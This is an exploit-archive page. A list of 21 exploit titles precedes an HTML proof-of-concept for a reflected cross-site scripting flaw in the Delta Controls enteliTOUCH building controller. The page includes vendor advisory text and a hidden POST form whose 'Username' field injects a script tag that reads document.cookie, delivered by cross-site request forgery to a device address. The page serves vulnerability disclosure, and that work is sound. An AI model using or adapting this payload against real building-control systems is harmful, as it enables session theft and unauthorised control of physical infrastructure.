093714dc70
21 changes to exploits/shellcodes Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path 7-zip - Code Execution / Local Privilege Escalation PTPublisher v2.3.4 - Unquoted Service Path EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path Zyxel NWA-1100-NH - Command Injection ManageEngine ADSelfService Plus 6.1 - User Enumeration Verizon 4G LTE Network Extender - Weak Credentials Algorithm Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure Scriptcase 9.7 - Remote Code Execution (RCE) WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection Easy Appointments 1.4.2 - Information Disclosure WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS) WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated) REDCap 11.3.9 - Stored Cross Site Scripting PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated) Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
56 lines
No EOL
1.7 KiB
HTML
56 lines
No EOL
1.7 KiB
HTML
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
|
|
# Exploit Author: LiquidWorm
|
|
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<head><title>enteliTouch XSS</title></head>
|
|
<body>
|
|
<!--
|
|
|
|
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)
|
|
|
|
|
|
Vendor: Delta Controls Inc.
|
|
Product web page: https://www.deltacontrols.com
|
|
Affected version: 3.40.3935
|
|
3.40.3706
|
|
3.33.4005
|
|
|
|
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
|
|
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
|
|
high-resolution display that serves as an interface to your building.
|
|
Use it as your primary interface for smaller facilities or as an
|
|
on-the-spot access point for larger systems. The intuitive,
|
|
easy-to-navigate interface gives instant access to manage your BAS.
|
|
|
|
Desc: Input passed to the POST parameter 'Username' is not properly
|
|
sanitised before being returned to the user. This can be exploited
|
|
to execute arbitrary HTML code in a user's browser session in context
|
|
of an affected site.
|
|
|
|
Tested on: DELTA enteliTOUCH
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2022-5703
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php
|
|
|
|
|
|
06.04.2022
|
|
|
|
-->
|
|
|
|
|
|
<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
|
|
<input type="hidden" name="userInfo" value="" />
|
|
<input type="hidden" name="UL_SelectedOptionId" value="" />
|
|
<input type="hidden" name="Username" value=""></script><script>alert(document.cookie)</script>" />
|
|
<input type="hidden" name="formAction" value="Delete" />
|
|
<input type="submit" value="CSRF XSS Alert!" />
|
|
</form>
|
|
|
|
</body>
|
|
</html> |